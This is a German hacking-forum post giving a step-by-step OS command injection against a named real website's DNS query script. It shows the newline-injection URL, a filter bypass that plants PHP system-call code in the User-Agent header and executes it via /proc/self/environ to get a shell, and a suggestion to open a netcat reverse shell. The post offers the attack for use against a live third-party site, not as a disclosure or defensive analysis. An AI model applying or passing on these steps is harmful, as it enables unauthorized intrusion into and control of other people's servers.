Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

webmaster-toolkit.com - OS Command Injection

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    129
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
http://www.webmaster-toolkit.com/dns-query.shtml?address=%0Als

%0A ist ein Zeilenumbruch als Hexadezimalzeichen. Die Zeichen ;|`&$()"\* können bei diesem Skript nicht verwendet werden weil sie rausgefiltert werden. Das bedeutet, daß viele Funktionen der Shell nur eingeschränkt oder überhaupt nicht verfügbar sind. Datenbank-Abfragen mit dem mysql-Clienten über den Parameter -e sind so beispielweise nicht möglich.
Das kann man aber umgehen ohne eine zusätzliche Shell auf den Server zu laden oder sonst irgendwelche Veränderungen am System vorzunehmen. Wir können den php-Interpreter aufrufen und haben Leserechte für die Datei "/proc/self/environ". Mehr braucht man nicht.

Als erstes installieren wir im Firefox den User Agent Switcher. Der erlaubt es uns einen beliebigen Browser vorzutäuschen.
Jetzt erstellen wir damit einen neuen Browser und schreiben in das Feld "User-Agent" unseren php-Code.

Beispiel:
<? system("ls /*); ?>

Jetzt wählen wir den neu erstellten Browser aus und geben folgendes ein:

http://www.webmaster-toolkit.com/dns-query.shtml?address=%0Aphp%20/proc/self/environ

Der php-Code mit dem Shell-Befehl wird jetzt ausgeführt.
Damit haben wir eine voll funktionstüchtige Shell ohne das bestimmte Zeichen herausgefiltert werden.
Man kann natürlich auch einen ganz anderen php-Code nehmen um zum Beispiel eine Reverse-Shell mit Netcat zu bekommen.
Habe das jetzt aber nicht getestet.



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 41 user(s)


    , 0day, akayoshi, B1nary, BlackZetsu, Born2Hack, Bot4ng, Cervantes, Ch!ller, chimchoca7, connecting, corkscrew, Cyber-Agent, dnscode, eXalT, FalkE, FatalityMods, Framerater, gutzuu, jack4flash, Laggy, loginman1, lolorollo, mettbrot, most_uniQue, osibak, pdr0, pornoralle, rastalani, SirAlx, SirDuke, smc2014, Smokyjoe, Tortschi, veelporri, vôl, White-Warti, will, Xenio, xFAUSTx, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.